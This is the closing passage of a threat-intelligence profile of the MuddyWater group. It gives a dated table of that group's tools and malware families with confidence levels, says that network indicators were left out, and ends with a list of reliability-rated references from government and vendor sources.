Tool | Chisel / PLink / FRP (tunneling) | 2021-01 | 2026-01 | HIGH
Infra | Wasabi cloud storage (exfil target) | 2026-02 | 2026-02 | HIGH
Malware | POWERSTATS (PowerShell backdoor) | 2017-01 | 2025-06 | HIGH
Malware | MuddyC2Go (Golang C2) | 2023-11 | 2025-01 | HIGH
Malware | DarkBeatC2 (C2 framework) | 2024-04 | 2025-06 | HIGH
Malware | BugSleep | 2024-01 | 2025-06 | HIGH
Malware | MuddyViper | 2024-09 | 2025-03 | HIGH
Malware | RustyWater (Rust RAT) | 2026-01 | 2026-03 | HIGH
Malware | Dindoor (Deno backdoor) | 2026-02 | 2026-03 | HIGH
Malware | CHAR / GhostFetch / HTTP_VIP | 2026-01 | 2026-03 | MODERATE
Malware | BlackBeard (Rust backdoor) | 2025-08 | 2026-02 | MODERATE
Malware | Phoenix backdoor | 2025-10 | 2026-01 | MODERATE
Malware | DCHSpy surveillanceware | 2025-07 | 2025-12 | MODERATE

Note: All domain and IP IOCs omitted — MuddyWater rotates infrastructure at high frequency, rendering specific network indicators stale within weeks. Use STIX/TAXII feeds from ISAC partners or CISA for current indicators. Behavioral analytics against the TTP patterns above are the more durable detection approach.


References

  1. CISA, FBI, NSA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations (Advisory AA22-055A). https://www.cisa.gov/news-events/analysis-reports/ar22-055a. Rating: A1

  2. CISA. (2022, February 24). Malware Analysis Report MAR-10369127-1.v1 – MuddyWater. https://www.cisa.gov/news-events/analysis-reports/ar22-055a. Rating: A1

  3. US Cyber Command / CNMF. (2022, January 12). Iranian Intel Cyber Suite of Malware Uses Open Source Tools. https://www.cybercom.mil/Media/News/. Rating: A1

  4. Symantec / Broadcom. (2026, March 5). MuddyWater Targets US Bank, Airport, Defense Supplier with Dindoor Backdoor. [Vendor blog]. Rating: A1

  5. MITRE ATT&CK. MuddyWater (G0069). https://attack.mitre.org/groups/G0069/. Rating: A1

  6. The Hacker News. (2026, March 9). Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor. https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html. Rating: B2

  7. SC Media. (2026, March 6). Iranian APT Group MuddyWater Targets Multiple US Companies. https://www.scworld.com/news/iranian-apt-group-muddywater-targets-multiple-us-companies. Rating: B2

  8. Check Point Research. (2026, March 10). Iranian MOIS Actors & the Cyber Crime Connection. https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/. Rating: B2

  9. Unit 42, Palo Alto Networks. (2026, March). Boggy Serpens Threat Assessment. https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/. Rating: B2

  10. Group-IB. (2026, February). Operation Olalampo: Inside MuddyWater’s Latest Campaign. [Vendor report]. Rating: B2

  11. CloudSEK TRIAD Team. (2026, January 12). RustyWater: Iranian MuddyWater APT Deploys Rust-Based Implant. https://www.csoonline.com/article/4115379/iran-linked-muddywater-apt-deploys-rust-based-implant-in-latest-campaign.html. Rating: B2

  12. ESET Research. (2024, December). MuddyViper Backdoor Against Israeli Organizations. [Vendor report]. Rating: B2

  13. Deep Instinct. (2024, April). DarkBeatC2: The Latest MuddyWater Attack Framework. https://www.deepinstinct.com/blog/darkbeatc2. Rating: B2

  14. Deep Instinct. (2023, November). MuddyC2Go — Latest C2 Framework Used by Iranian APT MuddyWater Spotted in Israel. https://www.deepinstinct.com/blog/muddyc2go. Rating: B2

  15. Deep Instinct. (2023, June). PhonyC2: Revealing a New Malicious C2 Framework by MuddyWater. https://www.deepinstinct.com/blog/phonyc2. Rating: B2

  16. HarfangLab. (2025, March). MuddyWater Campaign Abusing Atera Agents. https://harfanglab.io/. Rating: B2

  17. Amazon Threat Intelligence. (2024, November). MuddyWater and Kinetic Operations. [Vendor report]. Rating: B2

  18. Proofpoint. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign. Rating: B2

  19. Picus Security. (2026, March 12). Iranian Threat Actors: What Defenders Need to Know. https://www.picussecurity.com/resource/iranian-threat-actors-what-defenders-need-to-know. Rating: C3

  20. Wikipedia. (Updated 2026). MuddyWater (hacker group). https://en.wikipedia.org/wiki/MuddyWater_(hacker_group). Rating: C3

Sources & Confidence

Source: PDB Threat Actor Registry · Profile v1

Brandon writes the profiles personally.